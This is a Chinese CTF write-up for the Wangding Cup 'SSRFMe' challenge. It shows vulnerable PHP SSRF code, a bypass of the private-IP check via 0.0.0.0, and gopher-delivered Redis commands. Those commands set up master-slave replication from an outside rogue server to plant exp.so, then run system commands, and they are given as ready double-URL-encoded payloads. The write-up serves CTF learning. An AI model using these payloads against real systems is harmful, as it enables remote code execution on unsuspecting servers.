当前位置: 首页 > news >正文

网鼎杯 2020 玄武组 SSRFMe

复习一下常见的redis主从复制
主要是redis伪服务器的选择和一些小坑点

<?php  
function check_inner_ip($url)  
{    $match_result=preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/',$url);  if (!$match_result)  {  die('url fomat error');  }  try  {        $url_parse=parse_url($url);  }  catch(Exception $e)  {  die('url fomat error');  return false;  }    $hostname=$url_parse['host'];    $ip=gethostbyname($hostname);    $int_ip=ip2long($ip);  return ip2long('127.0.0.0')>>24 == $int_ip>>24 || ip2long('10.0.0.0')>>24 == $int_ip>>24 || ip2long('172.16.0.0')>>20 == $int_ip>>20 || ip2long('192.168.0.0')>>16 == $int_ip>>16;  
}  function safe_request_url($url)  
{  if (check_inner_ip($url))  {  echo $url.' is inner ip';  }  else  {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $url);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);        curl_setopt($ch, CURLOPT_HEADER, 0);        $output = curl_exec($ch);        $result_info = curl_getinfo($ch);  if ($result_info['redirect_url'])  {            safe_request_url($result_info['redirect_url']);  }        curl_close($ch);        var_dump($output);  }  }  
if(isset($_GET['url'])){    $url = $_GET['url'];  if(!empty($url)){        safe_request_url($url);  }  
}  
else{    highlight_file(__FILE__);  
}  
// Please visit hint.php locally.  
?>

存在 curl_exec 执行 ssrf
对ip网段进行限制

return ip2long('127.0.0.0')>>24 == $int_ip>>24 || ip2long('10.0.0.0')>>24 == $int_ip>>24 || ip2long('172.16.0.0')>>20 == $int_ip>>20 || ip2long('192.168.0.0')>>16 == $int_ip>>16;

可以用 0.0.0.0代表本机地址绕过
访问 hint.php 获取提示
http://node4.anna.nssctf.cn:28207/?url=http://0.0.0.0/hint.php
image.png
存在redis 服务 (6379) 有授权密码是root
image.png
确实需要身份验证
image.png
root验证通过
接下来就是常规的redis主从复制流程
类似 mysql uqf提权 通过自定义函数 进行命令执行(root)
特别的 打redis主从复制不需要 遵循 redis RESP协议协议
直接redis 命令打就是了
这里 redis 伪服务端用的是 原版作者的改良版
https://github.com/Dliv3/redis-rogue-server
python3 redis-rogue-server.py --server-only
image.png
客户端先设置文件名,连接恶意Redis服务器

auth root
config set dir /tmp/
config set dbfilename exp.so
slaveof 23.94.38.86 21000
quit

两次url编码后

%25%36%31%25%37%35%25%37%34%25%36%38%25%32%30%25%37%32%25%36%66%25%36%66%25%37%34%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%39%25%37%32%25%32%30%25%32%66%25%37%34%25%36%64%25%37%30%25%32%66%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%36%35%25%37%38%25%37%30%25%32%65%25%37%33%25%36%66%25%30%61%25%37%33%25%36%63%25%36%31%25%37%36%25%36%35%25%36%66%25%36%36%25%32%30%25%33%32%25%33%33%25%32%65%25%33%39%25%33%34%25%32%65%25%33%33%25%33%38%25%32%65%25%33%38%25%33%36%25%32%30%25%33%32%25%33%31%25%33%30%25%33%30%25%33%30%25%30%61%25%37%31%25%37%35%25%36%39%25%37%34

用gopher 传递tcp数据流
image.png
image.png

执行成功 写入 自定义函数 到 /tmp/exp.so
接下来加载exp.so,执行任意命令即可

auth root
module load /tmp/exp.so
slaveof no one
system.exec 'env'
quit

两次url编码后

%25%36%31%25%37%35%25%37%34%25%36%38%25%32%30%25%37%32%25%36%66%25%36%66%25%37%34%25%30%61%25%36%64%25%36%66%25%36%34%25%37%35%25%36%63%25%36%35%25%32%30%25%36%63%25%36%66%25%36%31%25%36%34%25%32%30%25%32%66%25%37%34%25%36%64%25%37%30%25%32%66%25%36%35%25%37%38%25%37%30%25%32%65%25%37%33%25%36%66%25%30%61%25%37%33%25%36%63%25%36%31%25%37%36%25%36%35%25%36%66%25%36%36%25%32%30%25%36%65%25%36%66%25%32%30%25%36%66%25%36%65%25%36%35%25%30%61%25%37%33%25%37%39%25%37%33%25%37%34%25%36%35%25%36%64%25%32%65%25%36%35%25%37%38%25%36%35%25%36%33%25%32%30%25%32%37%25%36%35%25%36%65%25%37%36%25%32%37%25%30%61%25%37%31%25%37%35%25%36%39%25%37%34

image.png
成功执行了系统命令env

http://www.lryc.cn/news/365499.html

相关文章:

  • 纪念日文章:我的博客技术之路——两年回望
  • course-nlp——6-rnn-english-numbers
  • qnx 查看cpu使用
  • 设备上CCD功能增加(从接线到程序)
  • QT C++ QTableWidget 表格合并 setSpan 简单例子
  • Nvidia/算能 +FPGA+AI大算力边缘计算盒子:医疗健康智能服务
  • Oracle 误删数据后回滚
  • 【RAG提升技巧】查询改写HyDE
  • 前端面试题日常练-day56 【面试题】
  • 【frp】frpc客户端在ubuntu服务器上的配置
  • 构建LangChain应用程序的示例代码:20、使用LangChain的SQLDatabase包装器连接到Databricks运行时并执行查询操作教程
  • PHP Standards Recommendations(PSR)
  • [word] word2019中制表符的妙用 #媒体#笔记#知识分享
  • 太阳能航空障碍灯在航空安全发挥什么作用_鼎跃安全
  • NineData云原生智能数据管理平台新功能发布|2024年5月版
  • 【Android面试八股文】使用equals和==进行比较的区别?
  • 利用架构挖掘增强云管理
  • 力扣 48.旋转图像
  • 前端角色负责人岗
  • git根据历史某次提交创建新分支
  • 如何评价GPT-4o?GPT-4o和ChatGPT4.0的区别是啥呢?
  • 病理级Polymer酶标二抗IHC试剂盒上线!
  • 动态规划(多重背包问题+二进制优化)
  • AI学习指南机器学习篇-逻辑回归正则化技术
  • Django按照文章ID删除文章
  • Java | Leetcode Java题解之第136题只出现一次的数字
  • 文件系统小册(FusePosixK8s csi)【1 Fuse】
  • Bootstrap 环境安装
  • GWT 与 Python App Engine 集成
  • golang的函数为什么能有多个返回值?